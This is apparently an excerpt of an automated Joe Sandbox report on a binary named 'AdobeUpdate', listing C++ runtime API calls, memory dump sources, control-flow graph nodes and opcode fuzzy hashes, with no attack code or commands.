                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6C12A2F5B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: D@std@@@std@@U?$char_traits@$?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@
                                    • String ID:
                                    • API String ID: 2077694045-0
                                    • Opcode ID: 453be39fce51d7f91d2905c70a9c180258c8c2645e76f728006da0f14fafa6d1
                                    • Instruction ID: 2ea1f1fc5198d8f4d180ea46aa17b9d9dac0e189e585976221f3ac7a264ee197
                                    • Opcode Fuzzy Hash: 453be39fce51d7f91d2905c70a9c180258c8c2645e76f728006da0f14fafa6d1
                                    • Instruction Fuzzy Hash: 01414266A08A4582EB209F15D69023DA7A1FB85F96F158532DE9DC7768CF3CE8C6C340

                                    Control-flow Graph

                                    APIs
                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6C12A195F
                                    • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF6C12A1986
                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6C12A19A6
                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6C12A19E4
                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF6C12A19EB
                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6C12A19F9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@
                                    • String ID:
                                    • API String ID: 3901553425-0
                                    • Opcode ID: 3899ee91e1b713a6a50820146165eb8bad4d2aa0730d0caa4019f4f0777c2472
                                    • Instruction ID: e22ddd9ead213b25769a2a5f7410b6e94a6c7ca5a3d04ce330e70e09b9ff364c
                                    • Opcode Fuzzy Hash: 3899ee91e1b713a6a50820146165eb8bad4d2aa0730d0caa4019f4f0777c2472
                                    • Instruction Fuzzy Hash: 5F413436A09A9286EB208F15D7D013D6761FB46FA6F148631CEAE837A5CF3CD495C300

                                    Control-flow Graph

                                    APIs
                                    • ??0_Lockit@std@@QEAA@H@Z.MSVCP140(00000008,?,?,00007FF6C12A5197,?,?,?,00007FF6C12A47D8,?,?,?,?,?,?,?,00007FF6C12A2382), ref: 00007FF6C12A4CDA
                                    • ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,00007FF6C12A5197,?,?,?,00007FF6C12A47D8,?,?,?,?,?,?,?,00007FF6C12A2382), ref: 00007FF6C12A4CF4
                                    • ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,00007FF6C12A5197,?,?,?,00007FF6C12A47D8,?,?,?,?,?,?,?,00007FF6C12A2382), ref: 00007FF6C12A4D26
                                    • ?_Getcat@?$ctype@D@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,00007FF6C12A5197,?,?,?,00007FF6C12A47D8,?,?,?,?,?,?,?,00007FF6C12A2382), ref: 00007FF6C12A4D50
                                    • std::_Facet_Register.LIBCPMT ref: 00007FF6C12A4D69
                                    • ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,00007FF6C12A5197,?,?,?,00007FF6C12A47D8,?,?,?,?,?,?,?,00007FF6C12A2382), ref: 00007FF6C12A4D88
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Getgloballocale@locale@std@@Locimp@12@RegisterV42@@Vfacet@locale@2@std::_
                                    • String ID:
                                    • API String ID: 295490909-0
                                    • Opcode ID: bb4b9fba70b8cdda44d29502ec8ea9042cfbc8abe3e100e0a9e7bdf86edccc93
                                    • Instruction ID: 8f555e8d1252327a1593fa7f37ed4362fe112868feedb4454a77daaba12aee4c
                                    • Opcode Fuzzy Hash: bb4b9fba70b8cdda44d29502ec8ea9042cfbc8abe3e100e0a9e7bdf86edccc93
                                    • Instruction Fuzzy Hash: 59215E2AA08A8281EB149F15E5902B96760FB89F96F1C0531DF9D877A9DF3CE8D5C340

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 601 7ff6c12a4390-7ff6c12a43bc 602 7ff6c12a44c2-7ff6c12a44c7 call 7ff6c12aa594 601->602 603 7ff6c12a43c2-7ff6c12a43e7 601->603 614 7ff6c12a44c8-7ff6c12a44f3 call 7ff6c12a9fc8 602->614 604 7ff6c12a43f7-7ff6c12a43fe 603->604 605 7ff6c12a43e9-7ff6c12a43f5 603->605 608 7ff6c12a4400 604->608 609 7ff6c12a442b-7ff6c12a442e 604->609 607 7ff6c12a441c-7ff6c12a4429 call 7ff6c12a1a70 605->607 619 7ff6c12a4451-7ff6c12a446a call 7ff6c12a2f98 607->619 611 7ff6c12a4403-7ff6c12a441a 608->611 613 7ff6c12a4434 609->613 609->614 611->607 615 7ff6c12a4436-7ff6c12a4439 611->615 613->611 627 7ff6c12a45d1-7ff6c12a45d6 call 7ff6c12aa594 614->627 628 7ff6c12a44f9-7ff6c12a451e 614->628 620 7ff6c12a443b 615->620 621 7ff6c12a444a 615->621 630 7ff6c12a4479-7ff6c12a447c 619->630 631 7ff6c12a446c-7ff6c12a4477 call 7ff6c12a2908 619->631 624 7ff6c12a443b call 7ff6c12acc88 620->624 625 7ff6c12a444c 621->625 629 7ff6c12a4440-7ff6c12a4448 624->629 625->619 642 7ff6c12a45d7-7ff6c12a45df call 7ff6c12a9fc8 627->642 632 7ff6c12a452e-7ff6c12a4535 628->632 633 7ff6c12a4520-7ff6c12a452c 628->633 629->625 639 7ff6c12a447e 630->639 640 7ff6c12a4492-7ff6c12a7826 call 7ff6c12a26b8 630->640 631->640 636 7ff6c12a4561-7ff6c12a4564 632->636 637 7ff6c12a4537 632->637 638 7ff6c12a4552-7ff6c12a455f call 7ff6c12a1a70 633->638 636->642 647 7ff6c12a4566 636->647 644 7ff6c12a453a-7ff6c12a4550 637->644 654 7ff6c12a4588-7ff6c12a4598 638->654 646 7ff6c12a4483-7ff6c12a4490 639->646 658 7ff6c12a7859-7ff6c12a7880 640->658 659 7ff6c12a7828-7ff6c12a783a 640->659 660 7ff6c12a7888-7ff6c12a78ae 642->660 644->638 650 7ff6c12a4568-7ff6c12a456d 644->650 646->640 646->646 647->644 655 7ff6c12a456f 650->655 656 7ff6c12a457e 650->656 661 7ff6c12a45a5-7ff6c12a45cc call 7ff6c12a26b8 654->661 662 7ff6c12a459a-7ff6c12a45a0 memset 654->662 663 7ff6c12a456f call 7ff6c12acc88 655->663 664 7ff6c12a4583 656->664 665 7ff6c12a7854 call 7ff6c12accc4 659->665 666 7ff6c12a783c-7ff6c12a784f 659->666 667 7ff6c12a78e1-7ff6c12a790e 660->667 668 7ff6c12a78b0-7ff6c12a78c2 660->668 661->660 662->661 670 7ff6c12a4574-7ff6c12a457c 663->670 664->654 665->658 671 7ff6c12a7881-7ff6c12a7887 _invalid_parameter_noinfo_noreturn 666->671 672 7ff6c12a7851 666->672 674 7ff6c12a78c4-7ff6c12a78d7 668->674 675 7ff6c12a78dc call 7ff6c12accc4 668->675 670->664 671->660 672->665 677 7ff6c12a790f-7ff6c12a793f _invalid_parameter_noinfo_noreturn 674->677 678 7ff6c12a78d9 674->678 675->667 681 7ff6c12a7991-7ff6c12a79c1 677->681 682 7ff6c12a7941-7ff6c12a7972 677->682 678->675 683 7ff6c12a7974-7ff6c12a7987 682->683 684 7ff6c12a798c call 7ff6c12accc4 682->684 685 7ff6c12a79c2-7ff6c12a79cb _invalid_parameter_noinfo_noreturn 683->685 686 7ff6c12a7989 683->686 684->681 686->684
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C12A44C8
                                    • memset.VCRUNTIME140(?,?,?,3FFFFFFFFFFFFFFF,?,?,?,00007FF6C12A4203,?,?,?,00007FF6C12A92B5), ref: 00007FF6C12A45A0
                                      • Part of subcall function 00007FF6C12ACC88: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6C12A8F80), ref: 00007FF6C12ACCA2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: Concurrency::cancel_current_taskmallocmemset
                                    • String ID:
                                    • API String ID: 2179613399-0
                                    • Opcode ID: 2365e17c2eae6f2e067b7312316ce99b5e0f0170b1b83df64bb02dafa12a696b
                                    • Instruction ID: 8976c1219d8b2720aed0c7ef592107e4ead7c300743f234dccb9f2f862b12360
                                    • Opcode Fuzzy Hash: 2365e17c2eae6f2e067b7312316ce99b5e0f0170b1b83df64bb02dafa12a696b
                                    • Instruction Fuzzy Hash: FCD1DF66B09A8985EB14CF56E64427963A4EB44FE1F588632DFED87BD4CE3CE491C300

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 688 7ff6c12a2dac-7ff6c12a2daf 689 7ff6c12a2db1-7ff6c12a2dd0 688->689 690 7ff6c12a2e27 688->690 691 7ff6c12a2dd3-7ff6c12a2dde 689->691 692 7ff6c12a2de0-7ff6c12a2df2 realloc 691->692 693 7ff6c12a2dfa-7ff6c12a2e0b 691->693 694 7ff6c12a2df4-7ff6c12a2df8 692->694 695 7ff6c12a2e28-7ff6c12a2e66 ?_Xbad_alloc@std@@YAXXZ 692->695 693->691 696 7ff6c12a2e0d-7ff6c12a2e25 693->696 694->693 698 7ff6c12a2e72 695->698 699 7ff6c12a2e68-7ff6c12a2e6b 695->699 696->690 701 7ff6c12a2e74-7ff6c12a2e87 call 7ff6c12a564c 698->701 699->698 700 7ff6c12a2e6d-7ff6c12a2e70 699->700 700->701 704 7ff6c12a2e93-7ff6c12a2ea6 701->704 705 7ff6c12a2e89-7ff6c12a2e8e 701->705 706 7ff6c12a2ed6-7ff6c12a2ef1 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 704->706 707 7ff6c12a2ea8-7ff6c12a2eab 704->707 708 7ff6c12a2f37-7ff6c12a2f54 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 705->708 710 7ff6c12a2f13-7ff6c12a2f16 706->710 711 7ff6c12a2ef3-7ff6c12a2ef6 706->711 707->706 709 7ff6c12a2ead-7ff6c12a2ec6 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 707->709 712 7ff6c12a2f62-7ff6c12a2f76 708->712 713 7ff6c12a2f56-7ff6c12a2f61 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 708->713 714 7ff6c12a2ed1-7ff6c12a2ed4 709->714 715 7ff6c12a2ec8-7ff6c12a2ecf 709->715 717 7ff6c12a2f1a-7ff6c12a2f27 710->717 716 7ff6c12a2ef8-7ff6c12a2f11 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 711->716 711->717 718 7ff6c12a2f7f-7ff6c12a2f95 712->718 719 7ff6c12a2f78-7ff6c12a2f7e 712->719 713->712 714->707 715->711 716->710 720 7ff6c12a2f29-7ff6c12a2f2c 716->720 717->708 719->718 720->708 720->711
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: D@std@@@std@@U?$char_traits@$?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@Xbad_alloc@std@@realloc
                                    • String ID:
                                    • API String ID: 2487731983-0
                                    • Opcode ID: 4a1f6d03ca14bf1403e94171af387133f0202b7b6271c2f389aac75518f98b30
                                    • Instruction ID: 0dbbad309580ade2f55f0fbec26dc3c16c55971b792d79f6a1e5b18325b6a3b2
                                    • Opcode Fuzzy Hash: 4a1f6d03ca14bf1403e94171af387133f0202b7b6271c2f389aac75518f98b30
                                    • Instruction Fuzzy Hash: D5414336A08A8586EB219F15D64012DB7A1FB85F85F188431DF8D87B69CF3CE8D2C700

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00007FF6C12ACC88: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6C12A8F80), ref: 00007FF6C12ACCA2
                                    • ??0_Locinfo@std@@QEAA@PEBD@Z.MSVCP140 ref: 00007FF6C12A8FB8
                                    • ??0facet@locale@std@@IEAA@_K@Z.MSVCP140 ref: 00007FF6C12A8FCF
                                    • ?_Getcoll@_Locinfo@std@@QEBA?AU_Collvec@@XZ.MSVCP140 ref: 00007FF6C12A8FE8
                                    • ??1_Locinfo@std@@QEAA@XZ.MSVCP140 ref: 00007FF6C12A900C
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6C12A9053
                                      • Part of subcall function 00007FF6C12AB07C: ?c_str@?$_Yarn@D@std@@QEBAPEBDXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6C12A8F9D), ref: 00007FF6C12AB0B6
                                      • Part of subcall function 00007FF6C12AB07C: memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6C12A8F9D), ref: 00007FF6C12AB131
                                      • Part of subcall function 00007FF6C12AB07C: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6C12AB1C6
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: Locinfo@std@@$_invalid_parameter_noinfo_noreturn$??0_??0facet@locale@std@@??1_?c_str@?$_Collvec@@D@std@@Getcoll@_Yarn@mallocmemmove
                                    • String ID:
                                    • API String ID: 1602917343-0
                                    • Opcode ID: a78317c7dc147549a852ed621cc671225eacfe356231027a8034ae884b313f52
                                    • Instruction ID: e4858a113708bc6f873326c87ef6f5499d79884e07bd0196ca7a63caec1f0f23
                                    • Opcode Fuzzy Hash: a78317c7dc147549a852ed621cc671225eacfe356231027a8034ae884b313f52
                                    • Instruction Fuzzy Hash: 44316E36A09B8285FF24CF25E5403AA6261EF89B92F508231DADD837A5DF3CD4C6C700

                                    Control-flow Graph

                                    APIs
                                    • ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,00000001,?,00007FF6C12A523C,?,00000000,00000001,00007FF6C12A10A1), ref: 00007FF6C12A4C01
                                    • ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,00007FF6C12A523C,?,00000000,00000001,00007FF6C12A10A1), ref: 00007FF6C12A4C1B
                                    • ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,00007FF6C12A523C,?,00000000,00000001,00007FF6C12A10A1), ref: 00007FF6C12A4C4D
                                    • ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,00007FF6C12A523C,?,00000000,00000001,00007FF6C12A10A1), ref: 00007FF6C12A4CA9
                                      • Part of subcall function 00007FF6C12A8F38: ??0_Locinfo@std@@QEAA@PEBD@Z.MSVCP140 ref: 00007FF6C12A8FB8
                                      • Part of subcall function 00007FF6C12A8F38: ??0facet@locale@std@@IEAA@_K@Z.MSVCP140 ref: 00007FF6C12A8FCF
                                      • Part of subcall function 00007FF6C12A8F38: ?_Getcoll@_Locinfo@std@@QEBA?AU_Collvec@@XZ.MSVCP140 ref: 00007FF6C12A8FE8
                                      • Part of subcall function 00007FF6C12A8F38: ??1_Locinfo@std@@QEAA@XZ.MSVCP140 ref: 00007FF6C12A900C
                                      • Part of subcall function 00007FF6C12A8F38: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6C12A9053
                                    • std::_Facet_Register.LIBCPMT ref: 00007FF6C12A4C8F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: Locinfo@std@@$??0_??1_Lockit@std@@$??0facet@locale@std@@Bid@locale@std@@Collvec@@Facet_Getcoll@_Getgloballocale@locale@std@@Locimp@12@Register_invalid_parameter_noinfo_noreturnstd::_
                                    • String ID:
                                    • API String ID: 1009702548-0
                                    • Opcode ID: 8e30e28fb1fac57f1a0170126ba30d028ebb790b07cd25a607e1e29078725d41
                                    • Instruction ID: 1f62d5007902733b2b4ae836ed4b16398acde962ed2a13eac7ff34b7abb979e4
                                    • Opcode Fuzzy Hash: 8e30e28fb1fac57f1a0170126ba30d028ebb790b07cd25a607e1e29078725d41
                                    • Instruction Fuzzy Hash: D9219B2A608A8285EF159F11E654179A791EF84FA2F1C0131DE9D873E5DE3CE4C5C300

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: __current_exception__current_exception_contextterminate
                                    • String ID: csm
                                    • API String ID: 2542180945-1018135373
                                    • Opcode ID: 4c4bbd4a42ae7351677d875046182b1a39caa59085d51b43aab2762be9c7daf4
                                    • Instruction ID: 346025f50a1c338963cf6e9efdd323d9e6942a989eeeeddc7b7898f71afd344b
                                    • Opcode Fuzzy Hash: 4c4bbd4a42ae7351677d875046182b1a39caa59085d51b43aab2762be9c7daf4
                                    • Instruction Fuzzy Hash: 38F0F43B609B45CAC714AF22E8900AC3364F788B89B496130FA8D87756CF38D8918700
                                    APIs
                                    • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,00007FF6C12AA4CB,?,?,?,00007FF6C12AAE85), ref: 00007FF6C12AA577
                                    • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C12AAE85), ref: 00007FF6C12AA58B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: Xlength_error@std@@
                                    • String ID: string too long$vector<bool> too long
                                    • API String ID: 1004598685-1183328865
                                    • Opcode ID: 99b7cb9ba424e8a71ac46053b43b1e13783d236c9af943f7262ad633b9f0ead6
                                    • Instruction ID: dd9e4ebc2feb80d01e62b6cd6ffe4aa54800f80d2feb91458591ce3689501727
                                    • Opcode Fuzzy Hash: 99b7cb9ba424e8a71ac46053b43b1e13783d236c9af943f7262ad633b9f0ead6
                                    • Instruction Fuzzy Hash: 82C0120CD1A40FD1E33CAFA0D9450680320EB14302F600C31C38D8BC614D3C70E24702
                                    APIs
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00000000), ref: 00007FF6C12A9B4E
                                    • ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@@Z.MSVCP140(?,?,?,?,?,?,?,?,00000000), ref: 00007FF6C12A9B5A
                                    • ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@@Z.MSVCP140(?,?,?,?,?,?,?,?,00000000,?,00000000,00007FF6C12A3114,?,?,00000000,00007FF6C12A4001), ref: 00007FF6C12A9B65
                                    • ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@@Z.MSVCP140(?,?,?,?,?,?,?,?,00000000,?,00000000,00007FF6C12A3114,?,?,00000000,00007FF6C12A4001), ref: 00007FF6C12A9B70
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: W4error_type@regex_constants@1@@Xregex_error@std@@$_invalid_parameter_noinfo_noreturn
                                    • String ID:
                                    • API String ID: 853480605-0
                                    • Opcode ID: bee4f38196beb3b8a7a72e55541a746e88538d4e3c55e90de900931ecddeb9c7
                                    • Instruction ID: d26d5aa72e932d82d066b9385fdb53da19ab376f06a5ff26a18669582ad31b17
                                    • Opcode Fuzzy Hash: bee4f38196beb3b8a7a72e55541a746e88538d4e3c55e90de900931ecddeb9c7
                                    • Instruction Fuzzy Hash: 45E18C7AA0864286EF688E2BC69477C37A1FB45B81F144136CB9D87795DF3DE4A0E300
                                    APIs
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF6C12A7CE8), ref: 00007FF6C12A7FC8
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C12A7CE8), ref: 00007FF6C12A80C4
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C12A8003
                                      • Part of subcall function 00007FF6C12ACC88: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6C12A8F80), ref: 00007FF6C12ACCA2
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C12A80FF
                                      • Part of subcall function 00007FF6C12ACC88: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C12ACCBE
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1694273935.00007FF6C12A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C12A0000, based on PE: true
                                    • Associated: 00000001.00000002.1694220296.00007FF6C12A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694312718.00007FF6C12AF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694483866.00007FF6C12B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                    • Associated: 00000001.00000002.1694847088.00007FF6C12B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ff6c12a0000_AdobeUpdate.jbxd
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturn$malloc
                                    • String ID:
                                    • API String ID: 961033532-0
                                    • Opcode ID: 5a3981d2286dfb97adab2a8487f28cd1e0e5411dfcf1711b72f4f8558bf23c51
                                    • Instruction ID: db7fc75a843001afb32310c20094e24fda42e867a8cd6a6aa2061c3d0da0b8e9
                                    • Opcode Fuzzy Hash: 5a3981d2286dfb97adab2a8487f28cd1e0e5411dfcf1711b72f4f8558bf23c51
                                    • Instruction Fuzzy Hash: B8B1A22AB0868286EB149F25A7542BD6361EF44BC2F584431EBDD87B96CF3DE4E1C304
                                    APIs
                                    • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAPEADXZ.MSVCP140 ref: 00007FF6C12AB24E
                                    Memory Dump Source
